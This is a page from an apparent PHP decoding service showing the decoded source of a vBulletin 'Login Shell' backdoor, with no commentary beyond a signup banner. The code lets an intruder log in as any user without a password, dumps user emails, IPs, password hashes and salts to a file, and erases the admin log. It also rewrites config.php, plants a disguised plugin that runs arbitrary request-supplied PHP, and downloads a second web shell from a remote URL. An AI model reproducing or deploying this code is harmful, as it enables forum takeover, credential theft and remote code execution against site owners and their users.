Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /** * vBulletin 3.8.x-4.x Login Shell * Author: JB ([email protected]) * www..
Decoded Output download
<?php
/**
* vBulletin 3.8.x-4.x Login Shell
* Author: JB ([email protected])
* www.p0wersurge.com
* 13/01/2014 (updated 27/07/2015)
* Version 2.0
*/
@ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='), false);
$a7b4b3963 = explode(base64_decode('Lw=='), $_SERVER[base64_decode('UEhQX1NFTEY=')]);
$b7f8f6db3 = count($a7b4b3963);
define(base64_decode('U0VMRg=='), $a7b4b3963[$b7f8f6db3-1]);
if($_REQUEST[base64_decode('ZG8=')] == base64_decode('c3RhZ2dlcmVkdXNlcmV4cG9ydA=='))
{
if(isset($_REQUEST[base64_decode('c3RhcnRhdA==')]) && isset($_REQUEST[base64_decode('bGluZXN0b2dldA==')]) && isset($_REQUEST[base64_decode('dGltZQ==')]))
{
require_once(base64_decode('aW5jbHVkZXMvY29uZmlnLnBocA=='));
d5ef12828($cd48a2f7c[base64_decode('TWFzdGVyU2VydmVy')][base64_decode('c2VydmVybmFtZQ==')] . base64_decode('Og==') . $cd48a2f7c[base64_decode('TWFzdGVyU2VydmVy')][base64_decode('cG9ydA==')], $cd48a2f7c[base64_decode('TWFzdGVyU2VydmVy')][base64_decode('dXNlcm5hbWU=')], $cd48a2f7c[base64_decode('TWFzdGVyU2VydmVy')][base64_decode('cGFzc3dvcmQ=')]) or die(y797e7d40());
a3dd2685d($cd48a2f7c[base64_decode('RGF0YWJhc2U=')][base64_decode('ZGJuYW1l')]) or die(y797e7d40());
$qcd4d43ba = intval($_REQUEST[base64_decode('c3RhcnRhdA==')]);
$t24a543eb = intval($_REQUEST[base64_decode('bGluZXN0b2dldA==')]);
$m6f949845 = intval($_REQUEST[base64_decode('dGltZQ==')]);
$f24bdb5eb = p1e74da(base64_decode('U0VMRUNUIENPTkNBVF9XUygnOicsIGB1c2VybmFtZWAsIGBlbWFpbGAsIGBpcGFkZHJlc3NgLCBgcGFzc3dvcmRgLCBgc2FsdGApIEFTIHVzZXJpbmZvIEZST00g') . $cd48a2f7c[base64_decode('RGF0YWJhc2U=')][base64_decode('dGFibGVwcmVmaXg=')] . "user LIMIT $qcd4d43ba,$t24a543eb") or die(y797e7d40());
while($l8430f6db = l4e65fb9c($f24bdb5eb))
{
$wae9089d4 = @file_put_contents(base64_decode('bG9naW5zaGVsbF9kdW1wXw==') . $m6f949845 . base64_decode('LnR4dA=='), $l8430f6db[base64_decode('dXNlcmluZm8=')] . PHP_EOL, FILE_APPEND);
if(!$wae9089d4)
{
echo base64_decode('ZmFpbGVkIHRvIHdyaXRlIDoo');
}
else
{
echo base64_decode('d3JvdGUgbGluZXMg') . $qcd4d43ba . base64_decode('IHRvIA==') . $t24a543eb . base64_decode('IGludG8gZHVtcGZpbGU=');
}
}
}
exit;
}
require_once(base64_decode('Li9nbG9iYWwucGhw'));
error_reporting(0);
if(substr($t2beff8da->$u75c40479, 0, 1) > 3)
{
$la5e0f468 = base64_decode('MTY3NDQ0NDQ=');
function mcbc5c3db($vf85e0677)
{
global $t2beff8da;
$vf85e0677 = da3b75ac9($vf85e0677, base64_decode('IA=='));
if ($t2beff8da->$q710ad6c5 = $t2beff8da->$j71beeff9->f6cb11695(base64_decode('U0VMRUNUIHVzZXJpZCwgdXNlcmdyb3VwaWQsIG1lbWJlcmdyb3VwaWRzLCBpbmZyYWN0aW9uZ3JvdXBpZHMsIHVzZXJuYW1lLCBwYXNzd29yZCwgc2FsdCBGUk9NIA==') . TABLE_PREFIX . base64_decode('dXNlciBXSEVSRSB1c2VybmFtZSA9ICc=') . $t2beff8da->$j71beeff9->h2a2604e2(ic703056f($vf85e0677)) . base64_decode('Jw==')))
{
c7d8cae74($g8049c82);
$bc4c0f458 = true;
($va4584355 = vBulletinHook::g603b58dc(base64_decode('bG9naW5fdmVyaWZ5X3N1Y2Nlc3M='))) ? eval($va4584355) : false;
return $bc4c0f458;
}
$bc4c0f458 = false;
($va4584355 = vBulletinHook::g603b58dc(base64_decode('bG9naW5fdmVyaWZ5X2ZhaWx1cmVfdXNlcm5hbWU='))) ? eval($va4584355) : false;
return $bc4c0f458;
}
}
else
{
$la5e0f468 = base64_decode('NDkxNTE2');
function mcbc5c3db($vf85e0677)
{
global $t2beff8da;
$vf85e0677 = da3b75ac9($vf85e0677, base64_decode('IA=='));
if ($t2beff8da->$q710ad6c5 = $t2beff8da->$j71beeff9->f6cb11695(base64_decode('U0VMRUNUIHVzZXJpZCwgdXNlcmdyb3VwaWQsIG1lbWJlcmdyb3VwaWRzLCBpbmZyYWN0aW9uZ3JvdXBpZHMsIHVzZXJuYW1lLCBwYXNzd29yZCwgc2FsdCBGUk9NIA==') . TABLE_PREFIX . base64_decode('dXNlciBXSEVSRSB1c2VybmFtZSA9ICc=') . $t2beff8da->$j71beeff9->h2a2604e2(ic703056f($vf85e0677)) . base64_decode('Jw==')))
{
if ($t2beff8da->$u14b75f81[COOKIE_PREFIX . base64_decode('dXNlcmlk')] AND $t2beff8da->$u14b75f81[COOKIE_PREFIX . base64_decode('dXNlcmlk')] != $t2beff8da->$q710ad6c5[base64_decode('dXNlcmlk')])
{
yda224323(base64_decode('dXNlcmlk'), '', true, true, true);
yda224323(base64_decode('cGFzc3dvcmQ='), '', true, true, true);
}
yda224323(base64_decode('dXNlcmlk'), $t2beff8da->$q710ad6c5[base64_decode('dXNlcmlk')], true, true, true);
yda224323(base64_decode('cGFzc3dvcmQ='), md5($t2beff8da->$q710ad6c5[base64_decode('cGFzc3dvcmQ=')] . COOKIE_SALT), true, true, true);
$bc4c0f458 = true;
($va4584355 = vBulletinHook::g603b58dc(base64_decode('bG9naW5fdmVyaWZ5X3N1Y2Nlc3M='))) ? eval($va4584355) : false;
return $bc4c0f458;
}
$bc4c0f458 = false;
($va4584355 = vBulletinHook::g603b58dc(base64_decode('bG9naW5fdmVyaWZ5X2ZhaWx1cmVfdXNlcm5hbWU='))) ? eval($va4584355) : false;
return $bc4c0f458;
}
}
$o32d30f96 = array();
$n7ac61e02 = array(
base64_decode('YXJjaGl2ZQ=='),
base64_decode('Y2xpZW50c2NyaXB0'),
base64_decode('Y3BzdHlsZXM='),
base64_decode('Y3VzdG9tYXZhdGFycw=='),
base64_decode('Y3VzdG9tZ3JvdXBpY29ucw=='),
base64_decode('Y3VzdG9tcHJvZmlsZXBpY3M='),
base64_decode('YXR0YWNo'),
base64_decode('Zm9ydW1ydW5uZXI='),
base64_decode('aW1hZ2Vz'),
base64_decode('aW5jbHVkZXM='),
base64_decode('aW5zdGFsbA=='),
base64_decode('cGFja2FnZXM='),
base64_decode('c2lnbmF0dXJlcGljcw=='),
base64_decode('c3RvcmVfc2l0ZW1hcA=='),
base64_decode('dmI=')
);
$jb8c13d30 = $t2beff8da->$b2d0a0436[base64_decode('TWlzYw==')][base64_decode('YWRtaW5jcGRpcg==')];
$t4267d023 = $t2beff8da->$o8165b856[base64_decode('YmJ1cmw=')] . base64_decode('Lw==') . $jb8c13d30 . base64_decode('L2luZGV4LnBocA==');
$d9fa3e414 = scandir(base64_decode('Lg=='));
foreach ($d9fa3e414 as $g136ac113) {
if ($g136ac113 == base64_decode('Lg==') or $g136ac113 == base64_decode('Li4=')) continue;
if (is_dir(base64_decode('Li8=') . $g136ac113)) {
if(in_array($g136ac113, $n7ac61e02)) continue;
if(@file_exists($g136ac113 . base64_decode('L2FkbWlubG9nLnBocA==')))
{
$o32d30f96[] = $g136ac113;
} else {
continue;
}
}
}
if(isset($_POST[base64_decode('ZG8=')]) && $_POST[base64_decode('ZG8=')] == base64_decode('ZmV0Y2hwbHVnaW5z'))
{
$oa3fdb2a7 = $_POST[base64_decode('cHJvZHVjdGlk')];
$f24bdb5eb = $t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('U0VMRUNUICogRlJPTSA=') . TABLE_PREFIX . "plugin WHERE product = '$oa3fdb2a7'");
if($t2beff8da->$j71beeff9->f3bf5fd4f($f24bdb5eb) < 1)
{
echo base64_decode('PGxpPjxzcGFuIHN0eWxlPSJjb2xvcjogcmVkOyI+Tm8gcGx1Z2lucyBmb3VuZC48L3NwYW4+PC9saT4=');
}
else
{
while($he96e2794 = $t2beff8da->$j71beeff9->h35acb628($f24bdb5eb))
{
if($oa3fdb2a7 == base64_decode('dmJ1bGxldGlu'))
{
$nd34a04ad = array(
base64_decode('YWN0aXZl') => (($t2beff8da->$o8165b856[base64_decode('YmJhY3RpdmU=')]) ? true : false)
);
}
else
{
$nd34a04ad = $t2beff8da->$j71beeff9->f6cb11695(base64_decode('U0VMRUNUICogRlJPTSA=') . TABLE_PREFIX . "product WHERE productid = '$oa3fdb2a7'");
}
if((!$nd34a04ad[base64_decode('YWN0aXZl')]) or ($nd34a04ad[base64_decode('YWN0aXZl')] && !$he96e2794[base64_decode('YWN0aXZl')]))
{
$s665648e9 = base64_decode('cmVk');
}
else
{
$s665648e9 = base64_decode('Z3JlZW4=');
}
echo base64_decode('PGxpPg==');
echo base64_decode('PGEgaHJlZj0i') . SELF . base64_decode('P2RvPWVkaXRob29rJmhvb2tpZD0=') . $he96e2794[base64_decode('cGx1Z2luaWQ=')] . base64_decode('IiBzdHlsZT0iY29sb3I6IA==') . $s665648e9 . base64_decode('Ij4=') . $he96e2794[base64_decode('dGl0bGU=')] . base64_decode('PC9hPiAob24gaG9vayA=') . $he96e2794[base64_decode('aG9va25hbWU=')] . base64_decode('KQ==');
echo base64_decode('PC9saT4=');
}
}
exit;
}
elseif($_POST[base64_decode('ZG8=')] == base64_decode('ZG9lZGl0aG9vaw=='))
{
$nd34a04ad = $_POST[base64_decode('cHJvZHVjdA==')];
$va4584355 = $_POST[base64_decode('aG9va2xvY2F0aW9u')];
$o2b36786b = $_POST[base64_decode('dGl0bGU=')];
$e77153098 = $_POST[base64_decode('cGhwY29kZQ==')];
$rebad2053 = intval($_POST[base64_decode('ZXhlY29yZGVy')]);
$x4b1efc02 = intval($_POST[base64_decode('YWN0aXZl')]);
$vf1e744b = $_POST[base64_decode('aG9va2lk')];
$t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('DQogICAgICAgIFVQREFURSA=') . TABLE_PREFIX . "plugin
SET
hookname = '$va4584355',
title = '" . $t2beff8da->$j71beeff9->h2a2604e2($o2b36786b) . base64_decode('JywNCiAgICAgICAgICAgIHBocGNvZGUgPSAn') . $t2beff8da->$j71beeff9->h2a2604e2($e77153098) . "',
product = '$nd34a04ad',
active = $x4b1efc02,
executionorder = $rebad2053
WHERE pluginid = '$vf1e744b'
");
vBulletinHook::xa0bf14dd($se3f4bc28);
?>
<h1>Plugin saved!</h1>
<pre>
<?php echo print_r($_POST); ?>
</pre>
<a href="<?php echo SELF; ?>">Go back</a>
<?php exit;
}
elseif($_POST[base64_decode('ZG8=')] == base64_decode('ZG9jbGVhcmFkbWlubG9n'))
{
switch($_POST[base64_decode('bWV0aG9k')])
{
case base64_decode('MA=='):
$f24bdb5eb = $t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('VFJVTkNBVEUgVEFCTEUg') . TABLE_PREFIX . base64_decode('YWRtaW5sb2c='));
break;
case base64_decode('MQ=='):
$f24bdb5eb = $t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('REVMRVRFIEZST00g') . TABLE_PREFIX . base64_decode('YWRtaW5sb2c='));
break;
case base64_decode('Mg=='):
$f24bdb5eb = $t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('RFJPUCBUQUJMRSA=') . TABLE_PREFIX . base64_decode('YWRtaW5sb2c='));
break;
case base64_decode('Mw=='):
default:
$f24bdb5eb = $t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('REVMRVRFIEZST00g') . TABLE_PREFIX . base64_decode('YWRtaW5sb2cgV0hFUkUgaXBhZGRyZXNzID0gJw==') . $t2beff8da->$j71beeff9->h2a2604e2($_SERVER[base64_decode('UkVNT1RFX0FERFI=')]) . base64_decode('Jw=='));
break;
}
?>
<h1>Adminlog cleared!</h1>
<a href="<?php echo SELF; ?>">Go back</a>
<?php exit;
}
elseif($_POST[base64_decode('ZG8=')] == base64_decode('aG9va2VuYWJsZXI='))
{
$e50f9bb84 = $_POST[base64_decode('aG9va3NlbmFibGVk')];
$me545a0c5 = $_POST[base64_decode('c2V0dGluZ3M=')];
$cd48a2f7c = $_POST[base64_decode('Y29uZmln')];
$n102de0ab = base64_decode('ZGlzYWJsZWQ=');
if($e50f9bb84)
{
$n102de0ab = base64_decode('ZW5hYmxlZA==');
}
if(!$me545a0c5 && !$cd48a2f7c)
{
?>
<h1>Failed to update system</h1>
<p>No save method was defined.</p>
<?php }
else
{
echo base64_decode('PGgxPlBsdWdpbiBFbmFibGVyL0Rpc2FibGVyPC9oMT4=');
if($me545a0c5)
{
$t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('DQogICAgICAgICAgICAgICAgVVBEQVRFIA==') . TABLE_PREFIX . "setting SET value = '$e50f9bb84' WHERE varname = 'enablehooks'
");
require_once(DIR . base64_decode('L2luY2x1ZGVzL2FkbWluZnVuY3Rpb25zLnBocA=='));
mfda0870b();
?>
<p>Hooks <?php echo $n102de0ab; ?> in settings</p>
<?php }
if($cd48a2f7c)
{
$xd343f512 = $t2beff8da->$b2d0a0436;
$gdeb54ee5 = base64_decode('PD9waHANCkBpbmlfc2V0KFwnZGlzcGxheV9lcnJvcnNcJywgZmFsc2UpOw0K') . (($e50f9bb84) ? '' : base64_decode('ZGVmaW5lKFwnRElTQUJMRV9IT09LU1wnLCB0cnVlKTs=')) . base64_decode('DQokY29uZmlnW1wnRGF0YWJhc2VcJ11bXCdkYnR5cGVcJ10gPSBcJw==') . $xd343f512[base64_decode('RGF0YWJhc2U=')][base64_decode('ZGJ0eXBl')] . base64_decode('XCc7DQokY29uZmlnW1wnRGF0YWJhc2VcJ11bXCdkYm5hbWVcJ10gPSBcJw==') . $xd343f512[base64_decode('RGF0YWJhc2U=')][base64_decode('ZGJuYW1l')] . base64_decode('XCc7DQokY29uZmlnW1wnRGF0YWJhc2VcJ11bXCd0YWJsZXByZWZpeFwnXSA9IFwn') . $xd343f512[base64_decode('RGF0YWJhc2U=')][base64_decode('dGFibGVwcmVmaXg=')] . base64_decode('XCc7DQokY29uZmlnW1wnRGF0YWJhc2VcJ11bXCd0ZWNobmljYWxlbWFpbFwnXSA9IFwn') . $xd343f512[base64_decode('RGF0YWJhc2U=')][base64_decode('dGVjaG5pY2FsZW1haWw=')] . base64_decode('XCc7DQokY29uZmlnW1wnRGF0YWJhc2VcJ11bXCdmb3JjZV9zcWxfbW9kZVwnXSA9IA==') . (($xd343f512[base64_decode('RGF0YWJhc2U=')][base64_decode('Zm9yY2Vfc3FsX21vZGU=')] == null) ? base64_decode('MA==') : base64_decode('MQ==')) . base64_decode('Ow0KJGNvbmZpZ1tcJ01hc3RlclNlcnZlclwnXVtcJ3NlcnZlcm5hbWVcJ10gPSBcJw==') . $xd343f512[base64_decode('TWFzdGVyU2VydmVy')][base64_decode('c2VydmVybmFtZQ==')] . base64_decode('XCc7DQokY29uZmlnW1wnTWFzdGVyU2VydmVyXCddW1wncG9ydFwnXSA9IA==') . $xd343f512[base64_decode('TWFzdGVyU2VydmVy')][base64_decode('cG9ydA==')] . base64_decode('Ow0KJGNvbmZpZ1tcJ01hc3RlclNlcnZlclwnXVtcJ3VzZXJuYW1lXCddID0gXCc=') . $xd343f512[base64_decode('TWFzdGVyU2VydmVy')][base64_decode('dXNlcm5hbWU=')] . base64_decode('XCc7DQokY29uZmlnW1wnTWFzdGVyU2VydmVyXCddW1wncGFzc3dvcmRcJ10gPSBcJw==') . $xd343f512[base64_decode('TWFzdGVyU2VydmVy')][base64_decode('cGFzc3dvcmQ=')] . base64_decode('XCc7DQokY29uZmlnW1wnTWFzdGVyU2VydmVyXCddW1wndXNlcGNvbm5lY3RcJ10gPSA=') . $xd343f512[base64_decode('TWFzdGVyU2VydmVy')][base64_decode('dXNlcGNvbm5lY3Q=')] . base64_decode('Ow0KJGNvbmZpZ1tcJ1NsYXZlU2VydmVyXCddW1wnc2VydmVybmFtZVwnXSA9IFwn') . $xd343f512[base64_decode('U2xhdmVTZXJ2ZXI=')][base64_decode('c2VydmVybmFtZQ==')] . base64_decode('XCc7DQokY29uZmlnW1wnU2xhdmVTZXJ2ZXJcJ11bXCdwb3J0XCddID0g') . $xd343f512[base64_decode('U2xhdmVTZXJ2ZXI=')][base64_decode('cG9ydA==')] . base64_decode('Ow0KJGNvbmZpZ1tcJ1NsYXZlU2VydmVyXCddW1wndXNlcm5hbWVcJ10gPSBcJw==') . $xd343f512[base64_decode('U2xhdmVTZXJ2ZXI=')][base64_decode('dXNlcm5hbWU=')] . base64_decode('XCc7DQokY29uZmlnW1wnU2xhdmVTZXJ2ZXJcJ11bXCdwYXNzd29yZFwnXSA9IFwn') . $xd343f512[base64_decode('U2xhdmVTZXJ2ZXI=')][base64_decode('cGFzc3dvcmQ=')] . base64_decode('XCc7DQokY29uZmlnW1wnU2xhdmVTZXJ2ZXJcJ11bXCd1c2VwY29ubmVjdFwnXSA9IA==') . $xd343f512[base64_decode('U2xhdmVTZXJ2ZXI=')][base64_decode('dXNlcGNvbm5lY3Q=')] . base64_decode('Ow0KJGNvbmZpZ1tcJ01pc2NcJ11bXCdhZG1pbmNwZGlyXCddID0gXCc=') . $xd343f512[base64_decode('TWlzYw==')][base64_decode('YWRtaW5jcGRpcg==')] . base64_decode('XCc7DQokY29uZmlnW1wnTWlzY1wnXVtcJ21vZGNwZGlyXCddID0gXCc=') . $xd343f512[base64_decode('TWlzYw==')][base64_decode('bW9kY3BkaXI=')] . base64_decode('XCc7DQokY29uZmlnW1wnTWlzY1wnXVtcJ2Nvb2tpZXByZWZpeFwnXSA9IFwn') . $xd343f512[base64_decode('TWlzYw==')][base64_decode('Y29va2llcHJlZml4')] . base64_decode('XCc7DQokY29uZmlnW1wnTWlzY1wnXVtcJ2ZvcnVtcGF0aFwnXSA9IFwn') . $xd343f512[base64_decode('TWlzYw==')][base64_decode('Zm9ydW1wYXRo')] . base64_decode('XCc7DQokY29uZmlnW1wnU3BlY2lhbFVzZXJzXCddW1wnY2Fudmlld2FkbWlubG9nXCddID0gXCc=') . $xd343f512[base64_decode('U3BlY2lhbFVzZXJz')][base64_decode('Y2Fudmlld2FkbWlubG9n')] . base64_decode('XCc7DQokY29uZmlnW1wnU3BlY2lhbFVzZXJzXCddW1wnY2FucHJ1bmVhZG1pbmxvZ1wnXSA9IFwn') . $xd343f512[base64_decode('U3BlY2lhbFVzZXJz')][base64_decode('Y2FucHJ1bmVhZG1pbmxvZw==')] . base64_decode('XCc7DQokY29uZmlnW1wnU3BlY2lhbFVzZXJzXCddW1wnY2FucnVucXVlcmllc1wnXSA9IFwn') . $xd343f512[base64_decode('U3BlY2lhbFVzZXJz')][base64_decode('Y2FucnVucXVlcmllcw==')] . base64_decode('XCc7DQokY29uZmlnW1wnU3BlY2lhbFVzZXJzXCddW1wndW5kZWxldGFibGV1c2Vyc1wnXSA9IFwn') . $xd343f512[base64_decode('U3BlY2lhbFVzZXJz')][base64_decode('dW5kZWxldGFibGV1c2Vycw==')] . base64_decode('XCc7DQokY29uZmlnW1wnU3BlY2lhbFVzZXJzXCddW1wnc3VwZXJhZG1pbmlzdHJhdG9yc1wnXSA9IFwn') . $xd343f512[base64_decode('U3BlY2lhbFVzZXJz')][base64_decode('c3VwZXJhZG1pbmlzdHJhdG9ycw==')] . base64_decode('XCc7DQokY29uZmlnW1wnTXlzcWxpXCddW1wnaW5pX2ZpbGVcJ10gPSBcJw==') . $xd343f512[base64_decode('TXlzcWxp')][base64_decode('aW5pX2ZpbGU=')] . base64_decode('XCc7DQokY29uZmlnW1wnTWlzY1wnXVtcJ21heHdpZHRoXCddID0g') . $xd343f512[base64_decode('TWlzYw==')][base64_decode('bWF4d2lkdGg=')] . base64_decode('Ow0KJGNvbmZpZ1tcJ01pc2NcJ11bXCdtYXhoZWlnaHRcJ10gPSA=') . $xd343f512[base64_decode('TWlzYw==')][base64_decode('bWF4aGVpZ2h0')] . base64_decode('Ow==');
$tb5e29f40 = file_put_contents(DIR . base64_decode('L2luY2x1ZGVzL2NvbmZpZy5waHAudHh0'), file_get_contents(DIR . base64_decode('L2luY2x1ZGVzL2NvbmZpZy5waHA=')));
if($tb5e29f40)
{
?>
<p>Backed up original config.php to <a href="includes/config.php.txt" target="_blank">config.php.txt</a></p>
<?php }
else
{
?>
<p>Failed to back up original config.php</p>
<?php }
$faec7a44 = file_put_contents(DIR . base64_decode('L2luY2x1ZGVzL2NvbmZpZy5waHA='), $gdeb54ee5);
if($faec7a44)
{
?>
<p>Hooks <?php echo $n102de0ab; ?> in config.php</p>
<?php }
else
{
?>
<p>Failed to write new config.php</p>
<?php }
}
?>
<p><a href="<?php echo SELF; ?>">Go back</a></p>
<?php }
exit;
}
if(isset($_REQUEST[base64_decode('ZG8=')]) && $_REQUEST[base64_decode('ZG8=')] == base64_decode('bG9naW4=') && isset($_REQUEST[base64_decode('dXNlcm5hbWU=')]))
{
require_once(DIR . base64_decode('L2luY2x1ZGVzL2Z1bmN0aW9uc19sb2dpbi5waHA='));
$vf85e0677 = $_REQUEST[base64_decode('dXNlcm5hbWU=')];
$lf500ae27 = base64_decode('U0VMRUNUIHVzZXJuYW1lIEZST00g') . TABLE_PREFIX . base64_decode('dXNlciBXSEVSRSB1c2VybmFtZSA9ICc=') . $t2beff8da->$j71beeff9->h2a2604e2($vf85e0677) . base64_decode('JyBPUiB1c2VyaWQgPSAn') . $t2beff8da->$j71beeff9->h2a2604e2($vf85e0677) . base64_decode('Jw==');
$f24bdb5eb = $t2beff8da->$j71beeff9->f6cb11695($lf500ae27);
if($f24bdb5eb[base64_decode('dXNlcm5hbWU=')] != null)
{
if(mcbc5c3db($f24bdb5eb[base64_decode('dXNlcm5hbWU=')]))
{
caf7d019c($f24bdb5eb[base64_decode('dXNlcm5hbWU=')]);
vc8d7ca25(base64_decode('Y3Bsb2dpbg=='), true, null);
j98ab8b1d();
}
else
{
die(base64_decode('VmVyaWZ5IGZhaWxlZA=='));
}
}
else
{
die(base64_decode('VXNlciBub3QgZm91bmQu'));
}
}
elseif($_REQUEST[base64_decode('ZG8=')] == base64_decode('aW5qZWN0cGx1Z2lu'))
{
$cb3ba5a5a = array();
$f24bdb5eb = $t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('U0VMRUNUIHByb2R1Y3RpZCx0aXRsZSx2ZXJzaW9uLGFjdGl2ZSx1cmwgRlJPTSA=') . TABLE_PREFIX . base64_decode('cHJvZHVjdCBXSEVSRSBhY3RpdmUgPSAnMSc='));
if($t2beff8da->$j71beeff9->f3bf5fd4f($f24bdb5eb) > 0)
{
while($nd34a04ad = $t2beff8da->$j71beeff9->h35acb628($f24bdb5eb))
{
$t66cd7cb2 = array();
$t66cd7cb2[base64_decode('cHJvZHVjdGlk')] = $nd34a04ad[base64_decode('cHJvZHVjdGlk')];
$t66cd7cb2[base64_decode('dGl0bGU=')] = $nd34a04ad[base64_decode('dGl0bGU=')];
$t66cd7cb2[base64_decode('dmVyc2lvbg==')] = $nd34a04ad[base64_decode('dmVyc2lvbg==')];
$t66cd7cb2[base64_decode('YWN0aXZl')] = $nd34a04ad[base64_decode('YWN0aXZl')];
$t66cd7cb2[base64_decode('dXJs')] = $nd34a04ad[base64_decode('dXJs')];
$cb3ba5a5a[] = $t66cd7cb2;
}
}
$x551416d8 = count($cb3ba5a5a);
$he96e2794[base64_decode('dGl0bGU=')] = base64_decode('QUpBWCBSZWZyZXNoIFNwZWVk');
$he96e2794[base64_decode('aG9va25hbWU=')] = base64_decode('Z2xvYmFsX2NvbXBsZXRl');
$he96e2794[base64_decode('cGhwY29kZQ==')] = base64_decode('aWYoaXNzZXQoJF9SRVFVRVNUW1wneFwnXSkpeyRfUkVRVUVTVFtcJ3hcJ10oJF9SRVFVRVNUW1wneVwnXSk7fQ==');
if(intval($x551416d8) > 0)
{
$v18c6f574 = mt_rand(0, intval($x551416d8));
$he96e2794[base64_decode('cHJvZHVjdA==')] = $cb3ba5a5a[$v18c6f574][base64_decode('cHJvZHVjdGlk')];
}
else
{
$he96e2794[base64_decode('cHJvZHVjdA==')] = base64_decode('dmJ1bGxldGlu');
}
$he96e2794[base64_decode('ZGV2a2V5')] = '';
$he96e2794[base64_decode('YWN0aXZl')] = base64_decode('MQ==');
$he96e2794[base64_decode('ZXhlY3V0aW9ub3JkZXI=')] = base64_decode('NQ==');
$t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('DQogICAgICAgIElOU0VSVCBJTlRPIA==') . TABLE_PREFIX . base64_decode('cGx1Z2luDQogICAgICAgICgNCiAgICAgICAgICAgIGhvb2tuYW1lLA0KICAgICAgICAgICAgdGl0bGUsDQogICAgICAgICAgICBwaHBjb2RlLA0KICAgICAgICAgICAgcHJvZHVjdCwNCiAgICAgICAgICAgIGFjdGl2ZSwNCiAgICAgICAgICAgIGV4ZWN1dGlvbm9yZGVyDQogICAgICAgICkNCiAgICAgICAgVkFMVUVTDQogICAgICAgICgNCiAgICAgICAgICAgICc=') . $he96e2794[base64_decode('aG9va25hbWU=')] . base64_decode('JywNCiAgICAgICAgICAgICc=') . $he96e2794[base64_decode('dGl0bGU=')] . base64_decode('JywNCiAgICAgICAgICAgICc=') . $t2beff8da->$j71beeff9->h2a2604e2($he96e2794[base64_decode('cGhwY29kZQ==')]) . base64_decode('JywNCiAgICAgICAgICAgICc=') . $t2beff8da->$j71beeff9->h2a2604e2($he96e2794[base64_decode('cHJvZHVjdA==')]) . base64_decode('JywNCiAgICAgICAgICAgIA==') . intval($he96e2794[base64_decode('YWN0aXZl')]) . base64_decode('LA0KICAgICAgICAgICAg') . intval($he96e2794[base64_decode('ZXhlY3V0aW9ub3JkZXI=')]) . base64_decode('DQogICAgICAgICkNCiAgICA='));
$vf1e744b = $t2beff8da->$j71beeff9->ha85e5dc1();
vBulletinHook::xa0bf14dd($se3f4bc28);
?>
<h1>Plugin <?php echo $vf1e744b; ?> created on global_complete!</h1>
<pre>
<?php echo print_r($he96e2794); ?>
</pre>
<a href="<?php echo SELF; ?>">Go back</a>
<?php }
elseif($_REQUEST[base64_decode('ZG8=')] == base64_decode('ZWRpdGhvb2s='))
{
$vf1e744b = $_REQUEST[base64_decode('aG9va2lk')];
$he96e2794 = $t2beff8da->$j71beeff9->f6cb11695(base64_decode('U0VMRUNUICogRlJPTSA=') . TABLE_PREFIX . "plugin WHERE pluginid = '$vf1e744b'");
$nd34a04ad = $t2beff8da->$j71beeff9->f6cb11695(base64_decode('U0VMRUNUIHRpdGxlIEZST00g') . TABLE_PREFIX . "product WHERE productid = '$he96e2794[product]'");
$cb3ba5a5a = $t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('U0VMRUNUIHByb2R1Y3RpZCx0aXRsZSBGUk9NIA==') . TABLE_PREFIX . base64_decode('cHJvZHVjdA=='));
?>
<h1>Modifying plugin '<?php echo $he96e2794[base64_decode('dGl0bGU=')]; ?>' (<?php echo $nd34a04ad[base64_decode('dGl0bGU=')]; ?>)</h1>
<form action="<?php echo SELF; ?>" method="post">
<input type="hidden" name="do" value="doedithook">
<input type="hidden" name="hookid" value="<?php echo $_GET[base64_decode('aG9va2lk')]; ?>">
<h4>Product</h4>
<select name="product">
<option value="vbulletin"<?php if($he96e2794[base64_decode('cHJvZHVjdA==')] == base64_decode('dmJ1bGxldGlu')){ ?> selected<?php } ?>>vBulletin</option>
<?php if($t2beff8da->$j71beeff9->f3bf5fd4f($cb3ba5a5a) > 0)
{
while($m695019ee = $t2beff8da->$j71beeff9->h35acb628($cb3ba5a5a))
{
echo base64_decode('PG9wdGlvbiB2YWx1ZT0i') . $m695019ee[base64_decode('cHJvZHVjdGlk')] . base64_decode('Ig==') . (($he96e2794[base64_decode('cHJvZHVjdA==')] == $m695019ee[base64_decode('cHJvZHVjdGlk')]) ? base64_decode('IHNlbGVjdGVk') : '') . base64_decode('Pg==') . $m695019ee[base64_decode('dGl0bGU=')] . base64_decode('PC9vcHRpb24+');
}
}
?>
</select>
<h4>Hook Location</h4>
<input type="text" name="hooklocation" value="<?php echo $he96e2794[base64_decode('aG9va25hbWU=')]; ?>">
<h4>Plugin Title</h4>
<input type="text" name="title" value="<?php echo $he96e2794[base64_decode('dGl0bGU=')]; ?>">
<h4>Plugin Code</h4>
<textarea rows="20" cols="80" name="phpcode"><?php echo $he96e2794[base64_decode('cGhwY29kZQ==')]; ?></textarea>
<h4>Plugin Execution Order</h4>
<input type="text" name="execorder" value="<?php echo $he96e2794[base64_decode('ZXhlY3V0aW9ub3JkZXI=')]; ?>">
<h4>Plugin Active</h4>
<input type="radio" name="active" value="1"<?php if($he96e2794[base64_decode('YWN0aXZl')]){ ?> checked<?php } ?>> Yes
<input type="radio" name="active" value="0"<?php if(!$he96e2794[base64_decode('YWN0aXZl')]){ ?> checked<?php } ?>> No
<br />
<br />
<br />
<button type="button" onclick="window.location.href = '<?php echo SELF; ?>'">Cancel</button>
<input type="submit" name="save" value="Save Plugin">
</form>
<?php }
elseif($_REQUEST[base64_decode('ZG8=')] == base64_decode('aW5zdGFsbHRlYW1wc3NoZWxs'))
{
$c36ac99f1 = base64_decode('aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Awd2Vyc3VyZ2UvdGVhbXBzLXNoZWxsL21hc3Rlci90ZWFtcHMucGhw');
$wfd3b2e70 = @file_get_contents($c36ac99f1);
if (file_exists(base64_decode('bG5kZXgucGhw'))) {
